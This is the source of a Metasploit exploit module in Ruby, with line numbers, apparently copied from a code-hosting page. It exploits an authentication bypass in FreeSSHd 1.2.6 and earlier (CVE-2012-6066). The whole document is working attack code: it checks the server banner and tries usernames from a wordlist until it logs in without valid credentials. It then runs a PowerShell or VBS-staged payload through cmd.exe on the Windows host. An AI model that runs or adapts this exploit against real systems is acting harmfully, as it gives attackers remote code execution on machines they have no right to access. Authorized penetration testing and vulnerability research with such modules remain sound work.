Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
class MetasploitModule < Msf::Exploit::Remote
8
  Rank = ExcellentRanking
9

10
  include Msf::Exploit::Remote::Tcp
11
  include Msf::Exploit::Powershell
12
  include Msf::Exploit::CmdStager
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name'           => "Freesshd Authentication Bypass",
19
        'Description'    => %q{
20
          This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass
21
          authentication. You just need the username (which defaults to root). The exploit
22
          has been tested with both password and public key authentication.
23
        },
24
        'License'        => MSF_LICENSE,
25
        'Author'         =>
26
          [
27
            'Aris', # Vulnerability discovery and Exploit
28
            'kcope', # 2012 Exploit
29
            'Daniele Martini <cyrax[at]pkcrew.org>', # Metasploit module
30
            'Imran E. Dawoodjee <imrandawoodjee[at][email protected]> (minor improvements)' # minor improvements
31
          ],
32
        'References'     =>
33
          [
34
            ['CVE', '2012-6066'],
35
            ['OSVDB', '88006'],
36
            ['BID', '56785'],
37
            ['URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html'],
38
            ['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132']
39
          ],
40
        'Platform'       => 'win',
41
        'Privileged'     => true,
42
        'Targets'        =>
43
          [
44
            ['PowerShell', {}],
45
            ['CmdStager upload', {}]
46
          ],
47
        'DefaultTarget'  => 0,
48
        'DisclosureDate' => '2010-08-11'
49
      )
50
    )
51

52
    register_options(
53
      [
54
        Opt::RPORT(22),
55
        OptString.new('USERNAME', [false, 'A specific username to try']),
56
        OptPath.new(
57
          'USER_FILE',
58
          [
59
            true,
60
            "File containing usernames, one per line",
61
            # Defaults to unix_users.txt, because this is the closest one we can try
62
            File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt")
63
          ]
64
        )
65
      ]
66
    )
67
  end
68

69
  def check
70
    connect
71
    banner = sock.recv(30)
72
    disconnect
73
    if banner.match?(/SSH\-2\.0\-WeOnlyDo/)
74
      version = banner.split(" ")[1]
75
      return Exploit::CheckCode::Vulnerable if version.match?(/(2\.1\.3|2\.0\.6)/)
76

77
      return Exploit::CheckCode::Detected
78
    end
79
    Exploit::CheckCode::Safe
80
  end
81

82
  def execute_command(cmd, _opts = {})
83
    @connection.exec!("cmd.exe /c " + cmd)
84
  end
85

86
  def setup_ssh_options
87
    {
88
      password:        rand_text_alpha(8),
89
      port:            datastore['RPORT'],
90
      timeout:         1,
91
      proxies:         datastore['Proxies'],
92
      key_data:        OpenSSL::PKey::RSA.new(2048).to_pem,
93
      auth_methods:    ['publickey'],
94
      verify_host_key: :never
95
    }
96
  end
97

98
  def do_login(username, options)
99
    print_status("Trying username '#{username}'")
100
    options[:username] = username
101

102
    transport = Net::SSH::Transport::Session.new(datastore['RHOST'], options)
103
    auth = Net::SSH::Authentication::Session.new(transport, options)
104
    auth.authenticate("ssh-connection", username, options[:password])
105
    connection = Net::SSH::Connection::Session.new(transport, options)
106
    begin
107
      Timeout.timeout(10) do
108
        connection.exec!('cmd.exe /c echo')
109
      end
110
    rescue Timeout::Error
111
      print_status("Timeout")
112
      return nil
113
    rescue RuntimeError
114
      return nil
115
    end
116
    connection
117
  end
118

119
  #
120
  # Cannot use the auth_brute mixin, because if we do, a payload handler won't start.
121
  # So we have to write our own each_user here.
122
  #
123
  def each_user
124
    user_list = []
125
    if datastore['USERNAME'] && !datastore['USERNAME'].empty?
126
      user_list << datastore['USERNAME']
127
    else
128
      f = File.open(datastore['USER_FILE'], 'rb')
129
      buf = f.read
130
      f.close
131

132
      user_list = (user_list | buf.split).uniq
133
    end
134

135
    user_list.each do |user|
136
      yield user
137
    end
138
  end
139

140
  def exploit
141
    unless [CheckCode::Vulnerable].include? check
142
      fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
143
    end
144

145
    options = setup_ssh_options
146

147
    @connection = nil
148

149
    each_user do |username|
150
      next if username.empty?
151

152
      @connection = do_login(username, options)
153
      break if @connection
154
    end
155

156
    if @connection
157
      case target.name
158
      when 'PowerShell'
159
        print_status('Executing payload via Powershell...')
160
        psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
161
        @connection.exec!("cmd.exe /c " + psh_command)
162
      when 'CmdStager upload'
163
        print_status("Uploading payload, this may take several minutes...")
164
        execute_cmdstager(flavor: :vbs, decoder: default_decoder(:vbs), linemax: 1700)
165
      end
166
    end
167
  end
168
end
169

170